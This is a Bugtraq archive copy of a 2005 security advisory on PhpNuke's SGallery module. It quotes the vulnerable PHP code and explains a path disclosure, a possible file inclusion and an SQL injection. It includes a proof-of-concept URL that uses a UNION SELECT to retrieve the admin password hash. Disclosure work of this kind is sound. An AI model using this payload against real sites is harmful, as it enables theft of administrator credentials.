[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [waraxe-2005-SA#039] - Critical Sql Injection in Sgallery module
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2005-01-12 22:55:07
Message-ID: 20050113030805.16723.qmail () www ! securityfocus ! com
[Download RAW message or body]




{================================================================================}
{                              [waraxe-2005-SA#039]                              }
{================================================================================}
{                                                                                }
{             [ Critical Sql Injection in Sgallery module for PhpNuke ]          }
{                                                                                }
{================================================================================}
                                                                                      \
                
Author: Janek Vind "waraxe"
Date: 12. January 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-39.html


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Module's Name: SGallery
Module's Version: 1.01
Module's Description: Simple JPG image gallery
License: GNU/GPL
Author's Name: Sergey Kiselev
Author's Email: ser@acmetelecom.ru

Homepage: http://www.ser.acmetelecom.ru


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's look at source code from imageview.php:


----------------[ original code ]---------------

require_once("$DOCUMENT_ROOT/config.php");
require_once("$DOCUMENT_ROOT/includes/sql_layer.php");
  
  $dbi = sql_connect ($dbhost,$dbuname,$dbpass,$dbname);

  if ($idalbum) {
    $result = sql_query("select picture from ".$prefix."_SGalbums where \
idalbum=".$idalbum,$dbi);  } elseif ($idimage) {
    $result = sql_query("select picture from ".$prefix."_SGimages where \
idimage=".$idimage,$dbi);  }

  list($echo) = sql_fetch_row($result, $dbi);
  sql_free_result($result);

  sql_logout ($dbi);

  header ("Content-Type: image/jpeg");
  echo $echo;

----------------[ /original code ]---------------

Now let's analyze the weak points.


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

If "$idalbum" and "$idimage" are both unset, then because of the open "if/elseif" \
construction there variable "$result" will be unset or can be poisoned through \
GET/POST/COOKIE. And next call of the "sql_fetch_row()" will trigger generic php \
error messages, leading to full path disclosure. Path disclosure is considered as low \
level security threat, but anyway it's useful for further malicious actions.


B - Potential arbitrary file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This kind of code construction as

require_once("$DOCUMENT_ROOT/config.php");
require_once("$DOCUMENT_ROOT/includes/sql_layer.php");

is not very secure. Depending of the webserver software vendor,version number and \
configuration settings it can lead to arbitrary file inclusion and possible remote \
file inclusion.


C - Critical sql injection bug in "imageview.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Looking at source code, presented above, we can see unsecure sql queries directed to \
the database. To be excact, user submitted variables "$idalbum" and/or "$idimage" are \
used in sql "SELECT" clause without escaping with single quotes. This is clearly sql \
injection bug. Further exploitation will depend on database software and version. In \
case of the mysql version 4.x with UNION functionality enabled, arbitrary data can be \
retrieved from database, inluding admin(s) authentication credentials. Traditionally, \
there is the proof of concept:


----------------[ real life exploit ]---------------

http://localhost/nuke75/modules/Sgallery/imageview.php?idimage=-99/**/UNION/
**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1

----------------[/real life exploit ]---------------

Best browser to test this POC is MSIE - it will show plaintext admin password's md5 \
hash as needed. Firefox and other browsers will mostly rendering out "broken picture" \
because of the "Content-Type: image/jpeg" header. But anyway, sql injection exists, \
can be exploited and must be fixed by vendor as soon as possible.


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Developer first contacted: 16. November 2004
No response from developer after multiple sent emails.
Downloadable version of the Sgalley is still unpatched.

How to fix this security hole - http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Base64 encoder and decoder - http://base64-encoder-online.waraxe.us/
SiteMapper - free php script for phpNuke powered websites - \
http://sitemapper.waraxe.us/ It's easy to install solution for making phpNuke more \
Google friendly!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to icenix, Raido Kerna, g0df4th3r and slimjim100!
Tervitused - Heintz!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic